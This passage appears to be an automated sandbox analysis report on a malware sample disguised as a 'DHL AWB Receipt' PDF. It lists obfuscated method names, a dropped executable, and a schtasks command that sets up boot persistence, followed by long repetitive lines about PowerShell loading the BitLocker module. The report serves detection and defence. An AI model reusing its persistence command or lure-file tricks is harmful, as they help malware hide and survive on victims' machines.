                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, W8hyW3yZl5RbMg6Z2l.csHigh entropy of concatenated method names: 'RXuhliTX5v', 'iXbh0u8xx9', 'NZmhpokAXo', 'LMAp4w9XyR', 'N9ZpzDl0Dk', 'JDhhSxTJ6Y', 'rD3hUFYwaM', 'XbihARcbKw', 'UTOh80Unr3', 'wE6hRoNcEV'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, rH1MMPNnIxKWXJ4Nrs.csHigh entropy of concatenated method names: 'VEwdKrtqcT', 'hvSdGoWlIM', 'coP0CAECa5', 'qF90oN2D6q', 'A890x2uDIn', 'Ijj0ZrmH0o', 'C2j0y8TZH0', 'kbM0HiClfY', 'HZe0cT7yaU', 'LbF07qafNB'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, AOwxT7iFU3JBbiw75C.csHigh entropy of concatenated method names: 'ToString', 'zm3JPw5lqj', 'O87JmpuiQU', 'LIDJCuSA9j', 'aDkJo5Zp3h', 'RV6Jxl2OuY', 'NdPJZMS6X6', 'BT2JyBA03X', 'gp2JHWDGgQ', 'BA9Jcv48lO'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, mGeAMkc9LMVR8hrHaX.csHigh entropy of concatenated method names: 'MohhtnDkht', 'iUchrERDXh', 'mZShYay6s0', 'uZ5hamGZYu', 'GtnhKFORII', 'H7ChLYMbrm', 'mbrhGNsZ53', 'edMhbuHeSH', 'YBMhEHf4SB', 'o6ghNsdpxM'
                Source: 0.2.DHL AWB Receipt_pdf.bat.exe.70d0000.5.raw.unpack, TD50XXRUSsUxUojIZN.csHigh entropy of concatenated method names: 'hWWUhQyDFP', 'Yc0UW1tALI', 'zBPUgVZa53', 'wGQUqmFH1M', 'p4NU3rssQR', 'woxUJ1Igvq', 'dSDqlj0MgwaZg20pIQ', 'a06Z3JKgrKbvfc9Suv', 'I5tUUxN0E4', 'WylU80hV6C'
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeFile created: C:\Users\user\AppData\Roaming\oSJLRdDbLeQ.exeJump to dropped file

                Boot Survival

                barindex
                Uses schtasks.exe or at.exe to add and modify task schedules
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\oSJLRdDbLeQ" /XML "C:\Users\user\AppData\Local\Temp\tmpD3C2.tmp"

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
